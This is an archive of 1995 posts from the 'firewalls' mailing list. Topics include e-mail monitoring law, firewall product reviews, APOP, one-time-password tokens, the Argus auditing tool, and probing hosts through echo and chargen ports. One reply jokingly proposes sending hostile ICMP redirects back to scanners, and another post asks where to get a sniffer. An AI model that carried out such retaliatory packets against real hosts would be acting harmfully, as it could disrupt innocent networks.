Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA26921; Thu, 11 May 95 12:22:19 -0400 Date: Thu, 11 May 95 12:22:18 -0400 Message-Id: <9505111622.AA26921@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Liable for security (monitoring E-Mail) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> You could go so far as to scan outgoing matterial (e-mail, usenet, >> etc.) for outgoing offensive material. >I thionk that the electronic privacy act on 1988 protects people in the US >against seraches of email that are going to or comming from an external >network.. Three comments on this (consult your local shyster, I isn't one): 1) If the corporation/agency/etc requires a signed statement acknowledging that "all commumications on the network are subject to monitoring and inapropriate material may be returned" as a condition of use, the privacy act would not cover since there would be a "quid pro quo". The US Department of Justice even prepared a formal statement that could be used a couple of years ago (about half a screenful) for that purpose. So far as I know the only people who have been taken to court (e.g. Epson) were companies that did not announce the fact that they were monitoring. Does not mean that companies that do not *want* to monitor for fear that they will find something will have to (that is what Exon's bill tried to do) but to say that an owner *cannot* monitor his own equipment would be a violation of fundamental property rights and that ain't going to happen here. Yet. 2) Headers may routinly be examined for packet type, source and destination without any warning, is considered the same as looking at the outside of an envelope without opening it. 3) Would not be surprised to find a decision come down that "there is no expectation of privacy on the Internet" - RFC 1281 effectively says that anyway. Warmly, Padgett From firewalls-owner Thu May 11 11:26:54 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA23626 for firewalls-outgoing; Thu, 11 May 1995 10:57:14 -0700 Received: from RUTADMIN.Rutgers.Edu (rutadmin.rutgers.edu [128.6.184.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA23618 for ; Thu, 11 May 1995 10:57:09 -0700 Message-Id: <199505111757.KAA23618@miles.greatcircle.com> Received: from RUTADMIN.BITNET by RUTADMIN.Rutgers.Edu (IBM MVS SMTP V2R2.1) with BSMTP id 5031; Thu, 11 May 95 13:56:56 EST Date: Thu, 11 May 95 13:56 EDT To: Firewalls Discussion List From: Nick Di Giovanni Subject: Re: Liable for Security Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A good book to consult for legal guidance is NETLAW by attorney Lanse Rose. This is an updated version of the book originally called SYSLAW. Sorry but I don't have the ISBN or publisher's name handy. Regards, Nick Di Giovanni Rutgers University From firewalls-owner Thu May 11 11:45:01 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA24612 for firewalls-outgoing; Thu, 11 May 1995 11:18:41 -0700 Received: from seraph.uunet.ca (uunet.ca [142.77.1.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA24606 for ; Thu, 11 May 1995 11:18:38 -0700 Received: from fujitsu.ca ([142.77.30.2]) by mail.uunet.ca with SMTP id <173472-8>; Thu, 11 May 1995 14:16:38 -0400 Received: by fujitsu.ca (4.1/SMI-4.1) id AA11269; Thu, 11 May 95 14:14:55 EDT Received: from falcon.fujitsu.ca(192.10.1.205) by jay via smap (V1.3) id sma011267; Thu May 11 14:14:26 1995 Received: by falcon (4.1/SMI-4.1) id AA11257; Thu, 11 May 95 14:14:11 EDT Date: Thu, 11 May 1995 14:14:11 -0400 From: rajani@fujitsu.ca (Rajani Ramkaran) Message-Id: <9505111814.AA11257@falcon> To: firewalls@greatcircle.com Subject: Review of different firewall products Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Has anyone come across any articles that review the various firewall products for eg. . how does Gauntlet compare to FireWall-1, to.. DEC's pdt .. etc.. I have comeacross articles that review the various firewall technologies.. i.e. application gateway vs packet .. But I am looking for is an actuall pdt review Thanks Rajani INTERNET: rajani@fujitsu.ca From firewalls-owner Thu May 11 12:06:34 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA23867 for firewalls-outgoing; Thu, 11 May 1995 11:01:41 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA23857 for ; Thu, 11 May 1995 11:01:36 -0700 Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU via SMTP; Thu, 11 May 1995 14:01:58 -0400 Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-5.67b/res.client.cf-3.7) id AA12121; Thu, 11 May 1995 14:01:56 -0400 Date: Thu, 11 May 1995 14:01:56 -0400 From: long-morrow@CS.YALE.EDU (H Morrow Long) Message-Id: <199505111801.AA12121@SPARKY.CF.CS.YALE.EDU> To: firewalls@greatcircle.com, lyndond@roverpte.demon.co.uk Subject: Re: apop Sender: firewalls-owner@GreatCircle.COM Precedence: bulk lyndond@roverpte.demon.co.uk wrote: >I am looking at logging in via pop3 from >across the net. Obviously I dont want to >use the standard pop3 as this sends the >password in plain text, what I do want is >to use one time passwords, perferably Skey. >I have heard about apop which does one time >passwords for pop3 and can be used with >Eudora. A search of archie only revealed >add ons for the mac eudora and no sign >of a server. Can anyone tell me if this >is available for the PC version and where >I can get the server from ? The pop server (popd) that comes with the MH 6.8 distribution contains #defines and code for APOP. You can get the MH 6.8 distribution from a few places around the net. I scanned the code of the Berkeley "popper" POP server but didn't see any references or code for APOP mode in it. - Morrow From firewalls-owner Thu May 11 12:09:33 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA24551 for firewalls-outgoing; Thu, 11 May 1995 11:17:26 -0700 Received: from Disclosure.COM (di.disclosure.com [199.97.230.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA24545 for ; Thu, 11 May 1995 11:17:21 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA13636; Thu, 11 May 95 14:20:21 EDT Date: Thu, 11 May 1995 14:20:20 -0400 (EDT) From: Scott Barman To: firewalls@GreatCircle.com Subject: Requesting "echo" Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Unfortunatly, I deleted the postings showing someone with screend blocking an echo UDP request. I had an interesting thought... Many have been setting up firewalls to block ICMP packets for their internal network (inbound and outbound). What if someone knows a little about your network and wants to see if the system exists? They can't use ping because the ICMP will be rejected. So why not try to use a real port that does nothing but is built into nearly every inetd there is? Why not use echo (port 7) or chargen (19) to see if one could get a response out of a system? I can see using it when there may be a likelihood that I may not get a response from the ping. This leads to a couple of questions: 1) How many people are filtering things like echo or chargen at the firewall or router? 2) How should a firewall respond when it receives a request for one of these services and they are being denied? scott barman scott@disclosure.com From firewalls-owner Thu May 11 12:09:47 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA26757 for firewalls-outgoing; Thu, 11 May 1995 12:07:28 -0700 Received: from mwunix.mitre.org (mwunix.mitre.org [128.29.154.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA26750 for ; Thu, 11 May 1995 12:07:25 -0700 Received: from smiley.sit (smiley.mitre.org [128.29.140.20]) by mwunix.mitre.org (8.6.10/8.6.4) with SMTP id PAA02640 for ; Thu, 11 May 1995 15:08:03 -0400 Received: from [128.29.140.130] (mckenney-mac) by smiley.sit (4.1/SMI-4.1) id AA08364; Thu, 11 May 95 15:06:50 EDT Date: Thu, 11 May 95 15:06:50 EDT Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: mckenney@smiley.mitre.org (Brian W. McKenney) Subject: Gobbler Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A while back, Christopher Klaus (cklaus@iss.net) posted a FAQ file on Sniffers. He noted that the Gobbler sniffer is available for DOS machines. Does anyone know where this is available on the Internet (e.g., FTP site)? I did ask Christopher, but he did not have a location. -Brian From firewalls-owner Thu May 11 13:15:15 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA28523 for firewalls-outgoing; Thu, 11 May 1995 13:01:13 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA28517 for ; Thu, 11 May 1995 13:01:10 -0700 Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU via SMTP; Thu, 11 May 1995 16:01:37 -0400 Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-5.67b/res.client.cf-3.7) id AA12521; Thu, 11 May 1995 16:01:34 -0400 Date: Thu, 11 May 1995 16:01:34 -0400 From: long-morrow@CS.YALE.EDU (H Morrow Long) Message-Id: <199505112001.AA12521@SPARKY.CF.CS.YALE.EDU> To: firewalls@GreatCircle.com, scott@Disclosure.COM Subject: Re: Requesting "echo" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk scott@disclosure.com wrote: >I had an interesting thought... Many have been setting up firewalls to >block ICMP packets for their internal network (inbound and outbound). >What if someone knows a little about your network and wants to see if >the system exists? They can't use ping because the ICMP will be >rejected. So why not try to use a real port that does nothing but >is built into nearly every inetd there is? > >Why not use echo (port 7) or chargen (19) to see if one could get a >response out of a system? I can see using it when there may be a >likelihood that I may not get a response from the ping. > >This leads to a couple of questions: >1) How many people are filtering things like echo or chargen at the >firewall or router? Most people who are filtering out ICMP protocol messages are probably filtering out most if not all UDP traffic as well -but there are also TCP versions of these "little services" which are often handled internally by modern inetds. >2) How should a firewall respond when it receives a request for one of >these services and they are being denied? o Log it. o Notify network administration via E-Mail, pager, etc. o Take pro-active defense measures such as send its own nasty ICMP messages (such as ICMP network unreachables and redirects for net 0 ) back to the source :-) - Morrow From firewalls-owner Thu May 11 14:09:21 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA29397 for firewalls-outgoing; Thu, 11 May 1995 13:51:51 -0700 Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA29392 for ; Thu, 11 May 1995 13:51:48 -0700 Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA03846; Thu, 11 May 1995 16:52:20 -0400 Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA25866; Thu, 11 May 1995 16:52:15 -0400 Message-Id: <9505112052.AA25866@wellspring.us.dg.com> Comments: Authenticated sender is From: "Jim Carroll" Organization: Data General (Canada) Inc. To: rajani@fujitsu.ca (Rajani Ramkaran), firewalls@greatcircle.com Date: Thu, 11 May 1995 16:52:04 -0500 Subject: Re: Review of different firewall products Reply-To: jcarroll@wellspring.us.dg.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.0-WB1) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 11 May 95 at 14:14, Rajani Ramkaran was heard to utter: > Hi > > Has anyone come across any articles that review the various firewall > products > > for eg. . how does Gauntlet compare to FireWall-1, to.. DEC's pdt .. > etc.. > > I have comeacross articles that review the various firewall > technologies.. i.e. application gateway vs packet .. > > But I am looking for is an actuall pdt review Check out the March 6/95 issue of Network World. Not complete, IMHO, but it's there, FWIW. -- Jim Carroll - jcarroll@wellspring.us.dg.com ... the usual disclaimers ... ## If you like this sort of thing, ## ## this is the sort of thing you'll like. ## From firewalls-owner Thu May 11 15:09:24 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA00372 for firewalls-outgoing; Thu, 11 May 1995 14:43:41 -0700 Received: from northshore.ecosoft.com (northshore.ecosoft.com [192.233.85.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA00367 for ; Thu, 11 May 1995 14:43:38 -0700 Received: from [198.115.177.208] (slip-0-8.shore.net) by northshore.ecosoft.com with SMTP id AA01448 (5.67a/IDA-1.5 for ); Thu, 11 May 1995 17:44:04 -0400 Message-Id: <199505112144.AA01448@northshore.ecosoft.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 10 May 1995 16:49:05 -0500 To: firewalls@greatcircle.com From: vin@shore.net (Vin McLellan) Subject: One Time Password Tokens Cc: Kare.Presttun@ansf.alcatel.fr Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Kare Presttun declared: >The correct statement is that there are two classes of tokens, >asynchronous ans synchronous. The first one is what is called >challenge response. The second category contains two technologies, >time synchronous and history synchronous. The secure ID is time >synchronous, and the new tokens from Enigma Logic can operate in >both asynchronous and history synchronous mode (nice technology >Bob). The history synchronous technology does not have the drawback >that the password is valid within a time window. With respect, this stuff about a "history synchronous" token is marketing gobblygook. This is a repackaged technology Enigma first introduced on one of their big "squashed bannana" tokens in the early 1980s and then withdrew -- I always thought -- because of its inherent security weaknesses. When cards became the rage, it came back. What we have here is a token which provides a sequential list of valid access codes upon demand. (Think of it as a Radio Shack version of the paper list of S/key codes you see guys pulling from their wallets at conventions.) Codes can thus be loaned to friends (a common problem) or punched out in advance so as to avoid carrying the token. With this technology -- unlike Enigma's standard C/R token -- there is no requirement that the token be physically present when a valid access call is submitted to a server. (The whole idea behind a token is that -- as a tangible physical device required to impliment the access process -- it can not be in more than one place at a time. This tech tosses the whole idea of a token into loonyland.) There are also some obvious potential problems in keeping the token's list and the server's list in synch. (In the original version, there was also a security issue in the way in which the server had to broaden the access window to search for a token out of sequential synch, but I forget the details.) Also, since you obviously can't feed a sequential list to more than one server, this is a one-machine logon device -- or, at least, it was with the original one-seed version. Enigma Logic makes several solid reliable products which perform as promised. I thought this one was a turkey ten years ago, and I think it is a turkey today. (Sorry, Bob;-) Anyone who thinks they can educate me, or otherwise convince me that this is not a dangerous, silly, insecure product is welcome to add their 2 cents. Suerte, _Vin -- Vin McLellan +The Privacy Guild+ USA Tel. (617) 884-5546 Mail: 53 Nichols St., Chelsea, Ma. 02150 '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ''''''' From firewalls-owner Thu May 11 15:39:46 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA00751 for firewalls-outgoing; Thu, 11 May 1995 15:12:37 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA00741 for ; Thu, 11 May 1995 15:12:32 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA28354; Thu, 11 May 95 18:10:39 -0400 Date: Thu, 11 May 95 18:10:38 -0400 Message-Id: <9505112210.AA28354@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Gobbler Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brian rites: >Does anyone know where this is available on the Internet (e.g., FTP site)? Have not looke for a while but last time I used ARCHIE to find it. The key is that GOBBLER is a companion to BEHOLDER and while ARCHIE will not find the first, it did find the other. You need both. Warmly, Padgett From firewalls-owner Thu May 11 17:09:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA02431 for firewalls-outgoing; Thu, 11 May 1995 16:45:27 -0700 Received: from as0a.sei.cmu.edu (as0a.sei.cmu.edu [128.237.1.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA02425 for ; Thu, 11 May 1995 16:45:24 -0700 Received: from ig.sei.cmu.edu by as0a.sei.cmu.edu (8.6.9/3.00) id TAA02215; Thu, 11 May 1995 19:44:31 -0400 Received: from localhost.sei.cmu.edu by ig.sei.cmu.edu (8.6.10/3.00) id TAA00119; Thu, 11 May 1995 19:44:29 -0400 Message-Id: <199505112344.TAA00119@ig.sei.cmu.edu> To: Firewalls@GreatCircle.COM From: argus@SEI.CMU.EDU cc: argus@SEI.CMU.EDU Subject: Argus-1.5, network auditing/management/firewall tool Date: Thu, 11 May 1995 19:44:29 EDT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The following is a release announcement of a new generic IP network transaction auditing tool named Argus. We have found that comprehensive network transaction auditing can be a powerful network management tool, and we think that a large number of sites can benefit from the prototype work that we have done in this area. We hope that you find Argus and the support tools helpful. If you have any questions, comments or suggestions please send mail to argus@sei.cmu.edu. --------- Argus 1.5 Software Engineering Institute Carnegie Mellon University argus@sei.cmu.edu ftp://ftp.sei.cmu.edu/pub/argus-1.5 This is to announce the availability of the public domain package, Argus, a generic IP network transaction auditing tool. Argus runs as an application level daemon, promiscuously reading network datagrams from a specified interface, and generates network traffic status records for the network activity that it encounters. Argus has been built and tested under SunOS 4.x, Solaris 2.3, and SGI IRIX5.2. The issue of portability has been principally addressed by the use of libpcap-0.0.x. Argus, enables a site to generate comprehensive network transaction audit logs, in a fashion that provides for high degrees of data reduction, and high degrees of semantic preservation. This has allowed us to perform extensive analysis of our network traffic, historically. The package includes two example programs for analyzing the network transaction audit logs. By processing these historical network logs, we have been able to, among other things: 1. Verify that our network security access control policies are actually being enforced and detect attempts to break through our firewall and host based mechanisms. 2. Perform grade of service analysis for every IP based network service that is offered in our network infrastructure. 3. Identify and troubleshoot difficult transient network problems such as intermittent service failure, denial of service attacks and host and network configuration problems. And by using the realtime features of Argus, we have been able to develop complex proactive network management tools. The data that Argus generates makes possible the ability to analyze network activity and performance in ways that have not been possible before. We are routinely answering questions such as: "Has anyone scanned this subnet for system vulnerabilities, such as that performed by SATAN?" "A new intrusion method has been discovered, has anyone tried to use it to attack the CERT Coordination Center's network in the past year?" "Did a new MUD server appear on any of the SEI machines last Tuesday?" "What network traffic was blocked by our router-enforced firewall?" "What is the average HTTP transaction connection time when a CMU host accesses MIT's WWW server?" "If we move the News server to another subnet, what other machines should be moved with it?" Each of these questions can be answered from the same historical network activity audit log. Comprehensive network transaction auditing can make a major impact on a sites network security. As we have had a great deal of success in using Argus to improve the network security at the Software Engineering Institute and CERT Coordination Center, we would like to emphasize this advantage of the use of Argus. We have found that comprehensive network transaction auditing can be a powerful network management tool, and we think that a large number of sites can benefit from the prototype work that we have done in this area. We hope that you find Argus and the support tools helpful. If you have any questions, comments or suggestions please send mail to argus@sei.cmu.edu. Again, thank you for your interest in Argus. Carter Bullard Software Engineering Institute Carnegie Mellon University wcb@sei.cmu.edu Chas DiFatta Software Engineering Institute Carnegie Mellon University chas@sei.cmu.edu From firewalls-owner Thu May 11 18:09:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA03208 for firewalls-outgoing; Thu, 11 May 1995 17:49:12 -0700 Received: from gwosi.telesc.gov.br (gwosi.telesc.gov.br [200.18.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA03174 for ; Thu, 11 May 1995 17:46:38 -0700 Received: by gwosi.telesc.gov.br (AIX 3.2/UCB 5.64/4.03) id AA15160; Thu, 11 May 1995 21:45:25 -0500 Date: Thu, 11 May 1995 21:35:58 -0500 (CDT) From: Jane Ferreira Cunha Subject: Firewall & 6611 To: firewalls@greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, everyone! Has anybody have any experience in building a firewall with a IBM 6611 router? Has anybody any opinion about configuring filters in it? All comments are welcome. Thanx. Jane Ferreira Cunha Telecommunications of Santa Catarina Brazil E-mail : jane@gwosi.telesc.gov.br From firewalls-owner Thu May 11 19:13:00 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA04148 for firewalls-outgoing; Thu, 11 May 1995 18:55:15 -0700 Received: from northshore.ecosoft.com (northshore.ecosoft.com [192.233.85.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id SAA04138 for ; Thu, 11 May 1995 18:55:12 -0700 Received: from [204.57.49.92] by northshore.ecosoft.com with SMTP id AA21800 (5.67a/IDA-1.5 for ); Thu, 11 May 1995 21:55:38 -0400 Date: Thu, 11 May 1995 21:55:38 -0400 Message-Id: <199505120155.AA21800@northshore.ecosoft.com> X-Sender: jr@shore.net Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: rajani@fujitsu.ca (Rajani Ramkaran), firewalls@greatcircle.com From: jr@vc.com (Jonathan Roosevelt) Subject: Re: Review of different firewall products Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ranjani Ramkaran wrote on May 11: >Hi > >Has anyone come across any articles that review the various firewall products > >for eg. . how does Gauntlet compare to FireWall-1, to.. DEC's pdt .. etc.. > >I have comeacross articles that review the various firewall technologies.. >i.e. application gateway vs packet .. > >But I am looking for is an actuall pdt review > >Thanks > >Rajani > >INTERNET: rajani@fujitsu.ca Try Internet Business Report, December 1994; Advanced Systems, December 1994; Interactive Age May 8, 1995. Could you direct me to the articles on various firewall technologies? The more basic the better. Thanks. Jonathan Roosevelt Battery Ventures 200 Portland Street Boston, MA 02114 voice: (617)367-1011 fax: (617)367-1070 From firewalls-owner Thu May 11 21:39:16 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA07075 for firewalls-outgoing; Thu, 11 May 1995 21:25:12 -0700 Received: from mail.eworld.com (hp1.online.apple.com [192.215.65.17]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA07070 for ; Thu, 11 May 1995 21:25:09 -0700 From: Kodzo@eworld.com Received: by hp1.online.apple.com (1.37.109.16/16.2) id AA059982749; Thu, 11 May 1995 21:25:49 -0700 Date: Thu, 11 May 1995 21:25:49 -0700 Message-Id: <950511212547_10151095@eWorld.com> To: firewalls@greatcircle.com Subject: What do you think of Sidewinder? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anybody have an opinion about Sidewinder they care to share? [How easy was it to install (any holes turn-up?), how is support, would you consider the product again, etc. .....] From firewalls-owner Thu May 11 22:39:21 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA08090 for firewalls-outgoing; Thu, 11 May 1995 22:26:01 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA08085 for ; Thu, 11 May 1995 22:25:59 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s9nF2-0000JYC; Thu, 11 May 95 22:26 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA25079; Thu, 11 May 1995 22:26:29 +0800 Date: Thu, 11 May 1995 22:26:29 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505120526.AA25079@brittany.oes.amdahl.com> To: firewalls@greatcircle.com Subject: Someone's feeding old articles back to firewalls Content-Length: 44 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Whoever's doing it please quit:) Patrick _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Thu May 11 22:52:07 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA08131 for firewalls-outgoing; Thu, 11 May 1995 22:27:58 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA08126 for ; Thu, 11 May 1995 22:27:56 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s9nH2-0000JYC; Thu, 11 May 95 22:28 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA25088; Thu, 11 May 1995 22:28:30 +0800 Date: Thu, 11 May 1995 22:28:30 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505120528.AA25088@brittany.oes.amdahl.com> To: danielh@panbio.com Subject: Re: Liable for security Cc: firewalls@greatcircle.com Content-Length: 97 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You are feeding firewalls articles back to me and a group of other people. Please quit. Patrick _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Fri May 12 00:09:25 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA09544 for firewalls-outgoing; Fri, 12 May 1995 00:03:49 -0700 Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA09539 for ; Fri, 12 May 1995 00:03:44 -0700 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id RAA02199 for ; Fri, 12 May 1995 17:01:01 +1000 Received: from citecuf.citec.qld.gov.au(147.132.176.10) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma002197; Fri May 12 17:00:41 1995 Received: from jaykay.citec.qld.gov.au (jaykay.citec.qld.gov.au [131.242.4.117]) by citecuf.citec.qld.gov.au (8.6.10/8.6.10) with SMTP id RAA02352 for ; Fri, 12 May 1995 17:03:40 +1000 Message-Id: <199505120703.RAA02352@citecuf.citec.qld.gov.au> From: "John Kidston" To: firewalls@GreatCircle.com Date: Fri, 12 May 1995 17:05:50 +10:0 Subject: Proxy aware ftp client for Mac Reply-to: j.kidston@citec.qld.gov.au Priority: normal X-mailer: Pegasus Mail/Windows (v1.22) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello all, Does anyone know of a Macintosh ftp client that will work transparently with a tis Toolkit ftp-gw? Any help will be much appreciated. Thanks in advance John Kidston j.kidston@citec.qld.gov.au CITEC voice: +61 7 2222356 fax: +61 7 2277890 317 Edward Street, Brisbane 4000, Australia ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "My opinions and CITEC's are not always the same." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Fri May 12 00:39:24 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA09614 for firewalls-outgoing; Fri, 12 May 1995 00:14:08 -0700 Received: from hearnvax.nic.surfnet.nl (hearnvax.nic.surfnet.nl [192.87.5.131]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA09609 for ; Fri, 12 May 1995 00:14:04 -0700 Received: from MinOCW.nl (mowmx001.MinOCW.nl) by HEARNVAX.nic.SURFnet.nl (PMDF V4.2-12 #3330) id <01HQESAY69LS0091EX@HEARNVAX.nic.SURFnet.nl>; Fri, 12 May 1995 09:14:22 +0200 (MET-DST) Received: from [145.67.148.3] by MinOCW.nl (4.1/SMI-4.1) id AA16683; Fri, 12 May 95 09:16:42 EDT Date: Fri, 12 May 1995 09:12:10 +0000 (GMT) From: "Marco.Heemskerk" Subject: Re: Digital's Firewall In-reply-to: Your message of Thu, 11 May 1995 09:24:16 -2359.<95051109241611@jasper.mcclellan.af.mil> To: mokbelsa@jasper.mcclellan.af.MIL Cc: firewalls@greatcircle.COM Message-id: <9505121316.AA16683@MinOCW.nl> X-Envelope-to: firewalls@greatcircle.COM Content-transfer-encoding: 7BIT Encoding: 18 TEXT , 36 MESSAGE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, If anybody sends info to mokbelsa, can he/she cc it to me? I'm also interested in Digital's firewall. Thanks! Marco Heemskerk __________________________________________________________________ M.B.L. Heemskerk RCC, Zoetermeer, the Netherlands Tel: 0031-79534789 Fax: 0031-79523189 __________________________________________________________________ 'It's the nineties, and thanks to the Internet, the whole world now can read what some nerd thinks about Star-Trek......' (Homer Simpson) >From firewalls-owner@GreatCircle.COM Thu May 11 20:14:55 1995 Return-Path: Received: from relay3.UU.NET ([192.48.96.8]) by MinOCW.nl (4.1/SMI-4.1) id AA15534; Thu, 11 May 95 20:14:55 EDT Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP id QQyphg12342; Thu, 11 May 1995 14:02:06 -0400 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA21011 for firewalls-outgoing; Thu, 11 May 1995 09:36:32 -0700 Received: from JASPER.MCCLELLAN.AF.MIL (jasper.mcclellan.af.mil [137.243.167.242]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA21001 for ; Thu, 11 May 1995 09:36:27 -0700 From: mokbelsa@jasper.mcclellan.af.mil Date: Thu, 11 May 1995 09:24:16 -2359 Message-Id: <95051109241611@jasper.mcclellan.af.mil> To: firewalls@greatcircle.com Subject: Digital's Firewall X-Vms-To: SMTP%"firewalls@greatcircle.com" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status: Hi all, Has anybody worked with DEC's internet firewall system? If so: - what do you think of it in terms of manageability, reliability, flexibility..? - how easy is it to add new application proxies to it? - any observations that you think are important? You can Email me directely if you wish at: mokbelsa@jasper.mcclellan.af.mil Thanks for any replies. Sam Mokbel Network Consultant From 